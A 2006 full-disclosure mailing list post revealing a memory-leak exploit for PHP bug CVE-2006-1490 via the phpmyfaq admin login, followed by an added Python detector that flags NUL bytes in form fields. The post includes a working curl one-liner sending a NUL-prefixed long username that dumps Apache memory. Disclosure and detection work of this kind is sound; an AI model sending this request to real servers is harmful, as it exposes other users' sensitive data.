Date: Fri, 1 Dec 2006 16:57:41 +0200
From: Tonu Samuel <tonu@....ee>
To: full-disclosure@...ts.grok.org.uk
Subject: phpmyfaq exploit using PHP bug, CVE-2006-1490

A long time ago I made unnecessary noise about a PHP zeroday. I expected it
to be maybe much more dangerous than it appeared to be in the end. There were
a lot of discussions and one main consensus was that this bug is not
exploitable in the real world because no one is using those vulnerable
functions.

This bug was originally found using the phpmyfaq software, and a wrong
assumption was made about the wideness of the problem. Anyway, now half a
year later, it is time to show the exploit:

curl "http://vulnerablehost/phpmyfaq/admin/index.php" -D - -d \
"faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

The longer the input you provide, the longer the memory dump you get. Works
if PHP is unpatched AND phpmyfaq is older than 1.6.0. The memory dump you get
is part of Apache memory and often contains sensitive information from other
served pages and contexts.

To make it clear - this is NOT the fault of the phpmyfaq people at all. Even
more, they made a workaround within an hour after I contacted them and urged
users to upgrade. phpmyfaq just appears to be one popular piece of software
which is easily findable by Google, and this was the software where the
initial discovery was made. The PHP people knew about the problem but ignored
it for long enough to discover it independently from them.

   Tõnu
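
Added example, not part of the original post and not phpmyfaq or PHP code: a
check that a request filter or log reviewer could apply to spot the request
shape shown above, a form field whose percent-decoded value contains a NUL
byte. It reports how much data follows the NUL because the post ties dump
size to input length. The sample bodies and the "submit" field are
constructed.

```python
"""Flag form fields that carry a raw NUL byte after percent-decoding."""
from urllib.parse import unquote_to_bytes


def decode_form(body):
    """Decode an application/x-www-form-urlencoded body to raw bytes per field."""
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        key = unquote_to_bytes(name.replace("+", " ")).decode("latin-1")
        # Keep values as bytes so a decoded %00 stays visible as b"\x00".
        fields[key] = unquote_to_bytes(value.replace("+", " "))
    return fields


def nul_findings(body):
    """Return one finding per field whose decoded value contains a NUL byte."""
    findings = []
    for name, raw in decode_form(body).items():
        pos = raw.find(b"\x00")
        if pos == -1:
            continue
        findings.append({
            "field": name,
            "nul_offset": pos,
            # Bytes after the first NUL: a C-string routine stops before
            # these, while a length-based routine still counts them.
            "bytes_after_nul": len(raw) - pos - 1,
        })
    return findings


# Constructed sample bodies (not captured traffic); "submit" is hypothetical.
BENIGN = "faqusername=admin&submit=Login"
SUSPECT = "faqusername=%00" + "E" * 64 + "&submit=Login"

if __name__ == "__main__":
    for body in (BENIGN, SUSPECT):
        print(nul_findings(body))
```

Rejecting any request for which nul_findings() is non-empty is a reasonable
default for login forms, since a username has no legitimate reason to contain
a NUL byte.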
